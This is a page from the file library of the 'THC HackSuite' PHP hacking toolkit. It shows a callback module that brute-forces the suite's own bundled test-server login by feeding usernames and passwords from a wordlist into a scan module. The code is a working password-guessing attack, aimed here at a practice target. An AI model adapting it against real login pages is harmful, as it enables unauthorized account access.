random gallery image
random tutorial
preview..cool, we will make a new module and not just some new module, nope let's make a fully automatic injection script! This tutorial is the first step into making this. Let's first..
random vulnerability assesment
THC AntiEvil
Attempts to find suspicious and evil files or code
HackSuite File Library
File Library
Here you can find the latest files and structure of the THC HackSuite, note that if you have an earlier version of the suite it's not recommended to update files manually. Instead you should overwrite your existing HackSuite environment.
<?php
/*
Bruteforce the TestServer
Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 12-11-2014
*/
if(!defined('IN_SCRIPT')){
exit;
}
// properties for this callback
$_CBACKD = array("Attack THC_HS Login","callbackbf.php");
// we still want the callback to work when the username or the success message changes
$aAttackVars = file($_PATHS['config_root']."/login_single_user.php");
$aAttackVarsU = explode("|",$aAttackVars[4]);
$aAttackVarsS = explode("|",$aAttackVars[8]);
$aGlobalConfig = array();
$aGlobalConfig['user'] = trim($aAttackVarsU[1]);
$aGlobalConfig['success'] = trim($aAttackVarsS[1]);
/* variable properties */
// visibility: [0] => hidden, [1] => visible, [2] => don't do anything
$_CBACKV = array();
$_CBACKV[0] = array();
$_CBACKV[0]['value'] = @str_replace("Modules/thc_ss/","",$_PATHS['servers_root_http'])."/login_single_user.php";
$_CBACKV[0]['row'] = "a1";
$_CBACKV[0]['fieldclass'] = "a1f";
$_CBACKV[0]['visibility'] = 0;
$_CBACKV[1] = array();
// set to zero, bcoz we wanna be as fast as possible when bruteforcing
$_CBACKV[1]['value'] = "0";
$_CBACKV[1]['row'] = "a2";
$_CBACKV[1]['fieldclass'] = "a2f";
$_CBACKV[1]['visibility'] = 0;
$_CBACKV[2] = array();
$_CBACKV[2]['value'] = $aGlobalConfig['success'];
$_CBACKV[2]['fieldclass'] = "a5f";
$_CBACKV[2]['row'] = "a4";
$_CBACKV[2]['visibility'] = 0;
$_CBACKV[3] = array();
$_CBACKV[3]['value'] = "post";
$_CBACKV[3]['row'] = "a5";
$_CBACKV[3]['fieldclass'] = "a6f";
$_CBACKV[3]['visibility'] = 0;
$_CBACKV[4] = array();
$_CBACKV[4]['value'] = 1;
$_CBACKV[4]['row'] = "a6";
$_CBACKV[4]['fieldclass'] = "scanf";
$_CBACKV[4]['visibility'] = 2;
$_CBACKV[5] = array();
// empty won't set any value
$_CBACKV[5]['value'] = "";
$_CBACKV[5]['row'] = "callbackfunction";
$_CBACKV[5]['fieldclass'] = "callbackfunctionf";
$_CBACKV[5]['visibility'] = 1;
if(!isset($_GETCBACK)){
/* Script that brute forces the testserver of the hacksuite
Callbck must always produce a query string, which will be passed back to the SScan module so it can be attached to the query string.
NOTE 1: this function uses global variables in order to construct the string which will be added to the query.
NOTE 2: settings from the thc_ss scan will automatically be adjusted to thc_hs' html login
NOTE 3: don't rewrite this function, instead make a new one with the same name
PARAMETERS:
NONE
RETURNS:
STRING: query string OR break key word BREAK
*/
if(!function_exists("Callbck")){
function Callbck(){
global $iOffsetKeyword;
global $aListWord;
global $aGlobalConfig;
if(!isset($aListWord[$iOffsetKeyword])){
// break script
return("BREAK");
}
$sString = "user=".$aGlobalConfig['user']."&pass=".trim($aListWord[$iOffsetKeyword]);
$iOffsetKeyword++;
return($sString);
}
}
// load thc wordlist
if(false===($aListWord = @file($_PATHS['wordlists_root']."/pw_a.txt"))){
die($sOut."You need the wordlist associated with the login_single_user.php server.".$sEnd);
}
$iOffsetKeyword = 0;
// dissect the target
$aUrl = @parse_url($_CBACKV[0]['value']);
// set loops variable
$iLoops = count($aListWord);
// make a copy of the old query
$aUrl['queryold'] = (isset($aUrl['query']) && $aUrl['query']!="" ? $aUrl['queryold'] : "");
}
?>
powered by
site stats
cms statistics:
version: 0.6.0downloads: 3903
native: 26
modules: 21
apps: 2
support development
It takes lots of calories in order to create new things for the hacksuite, so it would be grand if you could buy me a protein shake or extra energy to keep me going. Thanks!
disclaimer
We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!
site resources
remote resources
partners and friends